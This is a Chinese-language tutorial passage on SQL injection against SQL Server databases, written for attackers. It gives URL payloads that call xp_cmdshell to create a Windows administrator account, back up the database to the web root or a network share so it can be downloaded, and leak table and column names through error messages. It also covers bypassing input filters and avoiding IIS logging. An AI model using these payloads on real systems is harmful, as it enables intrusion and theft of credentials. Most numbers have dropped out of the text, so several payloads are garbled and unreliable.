第一节利用系统表注入SQLServer数据库
SQLServer是一个功能强大的数据库系统与操作系统也有紧密的联系这给开发者带来了很大的方便但另一方面也为注入者提供了一个跳板我们先来看看几个具体的例子
① ?id=;exec masterxp_cmdshell net user name password /add
分号;在SQLServer中表示隔开前后两句语句表示后面的语句为注释所以这句语句在SQLServer中将被分成两句执行先是Select出ID=的记录然后执行存储过程xp_cmdshell这个存储过程用于调用系统命令于是用net命令新建了用户名为name密码为password的windows的帐号接着
② ?id=;exec masterxp_cmdshell net localgroup name administrators /add
将新建的帐号name加入管理员组不用两分钟你已经拿到了系统最高权限!当然这种方法只适用于用sa连接数据库的情况否则是没有权限调用xp_cmdshell的
③ ?id= ;;and db_name()>
前面有个类似的例子and user>作用是获取连接用户名db_name()是另一个系统变量返回的是连接的数据库名
④ ?id=;backup database 数据库名 to disk=c:\inetpub\wwwroot\db;
这是相当狠的一招从③拿到的数据库名加上某些IIS出错暴露出的绝对路径将数据库备份到Web目录下面再用HTTP把整个数据库就完完整整的下载回来所有的管理员及用户密码都一览无遗!在不知道绝对路径的时候还可以备份到网络地址的方法(如\\xxxx\Share\db)但成功率不高
⑤ ?id= ;;and (Select Top name from sysobjects where xtype=U and status>)>
前面说过sysobjects是SQLServer的系统表存储着所有的表名视图约束及其它对象xtype=U and status>表示用户建立的表名上面的语句将第一个表名取出与比较大小让报错信息把表名暴露出来第二第三个表名怎么获取?还是留给我们聪明的读者思考吧
⑥ ?id= ;;and (Select Top col_name(object_id(表名)) from sysobjects)>
从⑤拿到表名后用object_id(表名)获取表名对应的内部IDcol_name(表名ID)代表该表的第个字段名将换成就可以逐个获取所猜解表里面的字段名
以上点是我研究SQLServer注入半年多以来的心血结晶可以看出对SQLServer的了解程度直接影响着成功率及猜解速度在我研究SQLServer注入之后我在开发方面的水平也得到很大的提高呵呵也许安全与开发本来就是相辅相成的吧
第二节绕过程序限制继续注入
在入门篇提到有很多人喜欢用号测试注入漏洞所以也有很多人用过滤号的方法来防止注入漏洞这也许能挡住一些入门者的攻击但对SQL注入比较熟悉的人还是可以利用相关的函数达到绕过程序限制的目的
在SQL注入的一般步骤一节中我所用的语句都是经过我优化让其不包含有单引号的在利用系统表注入SQLServer数据库中有些语句包含有号我们举个例子来看看怎么改造这些语句
简单的如where xtype=U字符U对应的ASCII码是所以可以用where xtype=char()代替如果字符是中文的比如where name=用户可以用where name=nchar()+nchar()代替
第三节经验小结
有些人会过滤SelectUpdateDelete这些关键字但偏偏忘记区分大小写所以大家可以用selecT这样尝试一下
在猜不到字段名时不妨看看网站上的登录表单一般为了方便起见字段名都与表单的输入框取相同的名字
特别注意地址栏的+号传入程序后解释为空格%B解释为+号%解释为%号具体可以参考URLEncode的相关介绍
用Get方法注入时IIS会记录你所有的提交字符串对Post方法做则不记录所以能用Post的网址尽量不用Get
猜解Access时只能用Ascii逐字解码法SQLServer也可以用这种方法只需要两者之间的区别即可但是如果能用SQLServer的报错信息把值暴露出来那效率和准确率会有极大的提高
防 范 方 法
SQL注入漏洞可谓是千里之堤溃于蚁穴这种漏洞在网上极为普遍通常是由于程序员对注入不了解或者程序过滤不严格或者某个参数忘记检查导致